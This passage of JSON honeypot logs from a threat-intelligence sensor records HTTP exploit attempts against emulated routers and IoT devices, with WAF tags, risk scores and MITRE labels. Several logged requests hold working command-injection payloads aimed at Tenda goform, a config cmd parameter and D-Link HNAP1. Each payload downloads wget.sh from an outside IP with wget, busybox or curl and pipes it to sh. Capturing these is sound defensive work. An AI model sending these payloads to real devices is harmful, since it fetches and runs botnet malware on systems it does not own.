fichier sensible \/ config \u00b7 confiance 100%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 64\/100 (Moyen) \u2014 MITRE T1083 \u2014 confiance 100 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 100, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 74.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 64}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 64, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022INT-http_sensitive\u0022, \u0022INT-upstream\u0022, \u0022INT-waf-score\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022Http Sensitive\u0022, \u0022Upstream\u0022, \u0022Waf Score\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022T1083\u0022, \u0022mitre_technique\u0022: \u0022T1083\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20tenda\u0022, \u0022request_line\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bcurl%20http:\/\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022config file probe \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wg\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/goform\/setUsbUnload\/.js?deviceName=A;cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20tenda%3Bbusybox%20wge\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 100 % \u2014 7 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 100 % \u2014 Score WAF 100 \u00b7 7 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_goform\u0022, \u0022http_sensitive_path\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_goform\u0022, \u0022http_sensitive_path\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":291},{"id":11860758,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59826,"dst_port":81,"service":"http","classification":"lfi_path_traversal","waf_score":53,"waf_tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022]","http_method":"GET","http_target":"\/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 2, \u0022http_query_params\u0022: 1, \u0022http_path_depth\u0022: 1, \u0022http_path_ext\u0022: null, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u002216d873425a44abcbc561dbf80ce01723ad77c248\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 260, \u0022payload_entropy\u0022: 5.0498090497234855, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 30.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0}, \u0022risk_score\u0022: 60, \u0022tag_count\u0022: 14, \u0022anomaly_count\u0022: 1, \u0022campaign_key\u0022: \u0022079a6db0bec2f20b9ed69dc87db9d24a9677dd35\u0022, \u0022event_fingerprint\u0022: \u0022a4fbcbeb9151d9d1fe55f404ad0b54bc301feeaf\u0022, \u0022classification_reason\u0022: \u0022Param\u00e8tres de scan \u00b7 confiance 59%\u0022, \u0022confidence\u0022: 0.59, \u0022classification_confidence\u0022: 0.59, \u0022precision_score\u0022: 70, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 59.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u00228e2536ed5e55924ac8b022b3e765521c\u0022, \u0022path_pattern_hash\u0022: \u00227b027b43ee202e99587271c9aa97af77\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 60}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022query_string\u0022: \u0022cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs HTTP\/1.1\u0022, \u0022payload_snippet\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wge\u0022, \u0022evidence\u0022: {\u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022query_string\u0022: \u0022cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022waf_tags\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022], \u0022waf_rule_names\u0022: [\u0022lfi-12\u0022, \u0022rce-0\u0022, \u0022rce-5\u0022, \u0022ssrf-3\u0022, \u0022nosqli-3\u0022, \u0022redir-1\u0022, \u0022webshell-param-cmd\u0022], \u0022request_line\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs HTTP\/1.1\u0022, \u0022request_sample\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs HTTP\/1.1\\r\\nHost: 62.3.50.33:81\\r\\nConnection: close\u0022, \u0022payload_snippet\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wge\u0022, \u0022classification_reason\u0022: \u0022Param\u00e8tres de scan \u00b7 confiance 59%\u0022}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022mitre_tactics\u0022: [\u0022TA0001\u0022, \u0022TA0002\u0022], \u0022mitre\u0022: \u0022TA0001\u0022, \u0022threat_family\u0022: [\u0022path_traversal\u0022], \u0022recommended_client_action\u0022: \u0022investigate\u0022, \u0022policy_mode\u0022: \u0022intelligence\u0022, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022event_signature\u0022: \u0022f18980edbfbb3a3c38244374adeb49ab0518d2a7\u0022, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022request_line\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022evidence_snippet\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wge\u0022, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget\u2026\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022site_display\u0022: {\u0022classification\u0022: null, \u0022classification_reason\u0022: \u0022Param\u00e8tres de scan \u00b7 confiance 59%\u0022, \u0022classification_reason_label_fr\u0022: \u0022Param\u00e8tres de scan \u00b7 confiance 59%\u0022, \u0022executive_one_liner_fr\u0022: \u0022Activit\u00e9 suspecte \u2014 risque 60\/100 (Moyen) \u2014 MITRE TA0001 \u2014 confiance 59 % \u2014 via HTTP\u0022, \u0022confidence_pct\u0022: 59, \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 30.0, \u0022risk_score\u0022: 60}, \u0022attack_stage\u0022: \u0022exploit_attempt\u0022, \u0022attack_stage_label\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022attack_chain_stage_label_fr\u0022: \u0022Exploitation\u0022, \u0022risk_score\u0022: 60, \u0022risk_label\u0022: \u0022Moyen\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022, \u0022dst_port\u0022: 81, \u0022protocol_emulated\u0022: true, \u0022tags_summary\u0022: [\u0022CRS-930100-sub\u0022], \u0022tags_summary_labels_fr\u0022: [\u0022CRS-930100-sub\u0022], \u0022recommended_action\u0022: \u0022investigate\u0022, \u0022recommended_action_label\u0022: \u0022Investiguer\u0022, \u0022mitre\u0022: \u0022TA0001\u0022, \u0022mitre_technique\u0022: \u0022TA0001\u0022, \u0022persona_hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022persona_service_banner\u0022: \u0022honeypot-http\u0022, \u0022correlation_flags\u0022: null, \u0022correlation_flags_labels_fr\u0022: null, \u0022sensor_role\u0022: \u0022threat_intelligence\u0022, \u0022sensor_role_label_fr\u0022: \u0022Renseignement menaces\u0022, \u0022confidence_hint_fr\u0022: null, \u0022protocol_details\u0022: {\u0022http_method\u0022: \u0022GET\u0022, \u0022http_path\u0022: \u0022\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dcs\u0022, \u0022request_line\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20\u2026\u0022, \u0022port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_label_fr\u0022: \u0022HTTP\u0022}, \u0022attack_vector\u0022: \u0022lfi path traversal \u00b7 via HTTP:81 \u00b7 (tentative d\u0027exploit) \u00b7 \u2192 \/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget\u2026\u0022, \u0022evidence_snippet\u0022: \u0022GET \/config\/?cmd=cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dcs%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wge\u0022, \u0022target_port_label\u0022: \u002281 \u00b7 HTTP\u0022, \u0022emulator_service\u0022: \u0022http\u0022, \u0022confidence_reason\u0022: \u0022Confiance 59 % \u2014 8 tag(s) WAF\u0022, \u0022confidence_factors_fr\u0022: \u0022Confiance 59 % \u2014 Score WAF 100 \u00b7 8 tag(s) WAF\u0022, \u0022campaign_hint_fr\u0022: null, \u0022attack_phases_timeline_fr\u0022: [{\u0022key\u0022: \u0022recon\u0022, \u0022label_fr\u0022: \u0022Reconnaissance\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022probe\u0022, \u0022label_fr\u0022: \u0022Sonde \/ probe\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploit_attempt\u0022, \u0022label_fr\u0022: \u0022Tentative d\u0027exploit\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022post_exploit\u0022, \u0022label_fr\u0022: \u0022Post-exploitation\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022c2\u0022, \u0022label_fr\u0022: \u0022Commande \u0026 contr\u00f4le\u0022, \u0022active\u0022: false, \u0022kind\u0022: \u0022stage\u0022}, {\u0022key\u0022: \u0022exploitation\u0022, \u0022label_fr\u0022: \u0022Exploitation\u0022, \u0022active\u0022: true, \u0022kind\u0022: \u0022chain\u0022, \u0022hint_fr\u0022: null}]}, \u0022meta_truncated\u0022: true, \u0022honeypot_persona\u0022: {\u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022mail_host\u0022: \u0022mail.sensor-1.internal\u0022, \u0022ldap_dc\u0022: \u0022dc.sensor-1.internal\u0022, \u0022k8s_cluster\u0022: \u0022hp-sensor-1\u0022, \u0022domain\u0022: \u0022sensor-1.internal\u0022, \u0022service_role\u0022: \u0022http\u0022, \u0022service_banner\u0022: \u0022honeypot-http\u0022, \u0022service_os\u0022: \u0022linux\u0022, \u0022dst_port\u0022: \u002281\u0022}, \u0022hostname\u0022: \u0022mail.sensor-1.internal\u0022, \u0022sensor_id\u0022: \u0022sensor-1\u0022, \u0022attack_chain_stage\u0022: \u0022exploitation\u0022, \u0022ban_policy\u0022: \u0022advisory_investigate\u0022, \u0022tags_list\u0022: [\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_config\u0022, \u0022http_scanner_params\u0022, \u0022http_suspicious_params\u0022, \u0022net_web_probe\u0022]}","tls_sni":null,"tls_ja3_hash":null,"tls_ja3":null,"http_version":"HTTP\/1.1","http_host":"62.3.50.33:81","http_user_agent":null,"http_referer":null,"tags":"[\u0022950309:lfi-12\u0022, \u0022950325:rce-0\u0022, \u0022950345:rce-5\u0022, \u0022950405:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950469:nosqli-3\u0022, \u0022950487:redir-1\u0022, \u0022950629:webshell-param-cmd\u0022, \u0022anomaly:high-entropy-query\u0022, \u0022http_no_ua\u0022, \u0022http_probe_config\u0022, \u0022http_scanner_params\u0022, \u0022http_suspicious_params\u0022, \u0022net_web_probe\u0022]","anomalies":"[\u0022high-entropy-query\u0022]","severity":10,"bytes_in":260},{"id":11860759,"ip":"45.156.87.213","ts":"2026-07-14 08:22:33.000000","proto":"tcp","src_port":59834,"dst_port":81,"service":"http","classification":"lfi_path_traversal","waf_score":87,"waf_tags":"[\u0022950308:lfi-12\u0022, \u0022950310:lfi-12\u0022, \u0022950324:rce-0\u0022, \u0022950326:rce-0\u0022, \u0022950332:rce-2\u0022, \u0022950334:rce-2\u0022, \u0022950344:rce-5\u0022, \u0022950346:rce-5\u0022, \u0022950404:ssrf-3\u0022, \u0022950406:ssrf-3\u0022, \u0022950468:nosqli-3\u0022, \u0022950470:nosqli-3\u0022, \u0022950486:redir-1\u0022]","http_method":"GET","http_target":"\/HNAP1\/GetDeviceSettings\/%60cd%20\/tmp%3Bwget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bbusybox%20wget%20http:\/\/91.92.40.118\/wget.sh%20-O-%7Csh%20-s%20dhnap2%3Bcurl%20http:\/\/91.92.40.118\/wget.sh%7Csh%20-s%20dhnap2%60","sensor_id":"paris-1","meta":"{\u0022protocol_emulated\u0022: true, \u0022emulator_response\u0022: \u0022485454502f312e3120323030204f4b0d0a5365727665723a204170616368652f322e342e35370d0a436f6e74656e742d4c656e6774683a20320d0a436f6e6e656374696f6e3a20636c6f73650d0a0d0a4f4b\u0022, \u0022emulator_response_len\u0022: 82, \u0022http_header_count\u0022: 3, \u0022http_query_params\u0022: 0, \u0022http_path_depth\u0022: 13, \u0022http_path_ext\u0022: \u0022sh%7csh%20-s%20dhnap2%60\u0022, \u0022http_ua_hash\u0022: null, \u0022http_host_hash\u0022: \u0022f257870e26046e30cbd03e9d5726ca53aa58b86f\u0022, \u0022http_target_hash\u0022: \u00221fb679dc6cc24300725ed92bb56df033406a9dbc\u0022, \u0022http_referer_hash\u0022: null, \u0022http_method\u0022: \u0022GET\u0022, \u0022http_ua_is_cli\u0022: false, \u0022http_ua_is_browser\u0022: false, \u0022bytes_in\u0022: 556, \u0022payload_entropy\u0022: 5.1050965460819935, \u0022port_category\u0022: \u0022well_known\u0022, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022service\u0022: \u0022http\u0022, \u0022app_proto\u0022: \u0022http\u0022, \u0022asn\u0022: 197170, \u0022country\u0022: \u0022NL\u0022, \u0022dst_port\u0022: 81, \u0022risk_waf\u0022: 100.0, \u0022risk_classification\u0022: 78.0, \u0022risk_behavior\u0022: 0.0, \u0022risk_geo\u0022: 0.0, \u0022risk_protocol\u0022: 43.0, \u0022risk_novelty\u0022: 25.0, \u0022risk_boost\u0022: 0, \u0022risk_granularity\u0022: 6.0, \u0022risk_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0}, \u0022risk_score\u0022: 65, \u0022tag_count\u0022: 16, \u0022anomaly_count\u0022: 0, \u0022campaign_key\u0022: \u00225d2621ff51a2c75cb4f597abd252da44ef116578\u0022, \u0022event_fingerprint\u0022: \u0022c64cd610d5464e272bd2b82106aed798146956e9\u0022, \u0022classification_reason\u0022: \u0022Type \u00ab lfi_path_traversal \u00bb (signaux protocolaires) \u00b7 confiance 100%\u0022, \u0022confidence\u0022: 1.0, \u0022classification_confidence\u0022: 1.0, \u0022precision_score\u0022: 140, \u0022precision_signals\u0022: [\u0022CRS-930100-sub\u0022], \u0022kb_rule_ids\u0022: [\u0022CRS-930100-sub\u0022], \u0022matched_patterns\u0022: [\u0022pat-0103\u0022, \u0022pat-0231\u0022], \u0022matched_pattern_names\u0022: [\u0022LFI Double-dot bypass\u0022, \u0022Probe \/HNAP1\/\u0022], \u0022pattern_ids\u0022: [\u0022pat-0103\u0022, \u0022pat-0231\u0022], \u0022confidence_breakdown\u0022: {\u0022waf\u0022: 100.0, \u0022classification\u0022: 78.0, \u0022behavior\u0022: 0.0, \u0022geo\u0022: 0.0, \u0022protocol\u0022: 43.0, \u0022novelty\u0022: 25.0, \u0022risk_score\u0022: 65}, \u0022named_classification_skipped\u0022: false, \u0022classification_parent\u0022: \u0022path_traversal\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_confidence_factor\u0022: 100.0, \u0022city\u0022: null, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false, \u0022geo\u0022: {\u0022country\u0022: \u0022NL\u0022, \u0022asn\u0022: 197170, \u0022org\u0022: \u0022TechTies Inc.\u0022, \u0022is_datacenter\u0022: false, \u0022is_tor_hint\u0022: false}, \u0022fingerprint\u0022: {\u0022payload_hash\u0022: \u0022375dd5be7f5235bfcb5bea4a0184a447\u0022, \u0022path_pattern_hash\u0022: \u00225342c0a41e9aeca887ae259faa8ece9f\u0022}, \u0022target_context\u0022: {\u0022dst_port\u0022: 81, \u0022service\u0022: \u0022http\u0022, \u0022service_name\u0022: \u0022http\u0022, \u0022risk_score\u0022: 65}, \u0022method\u0022: \u0022GET\u0022, \u0022path\u0022: 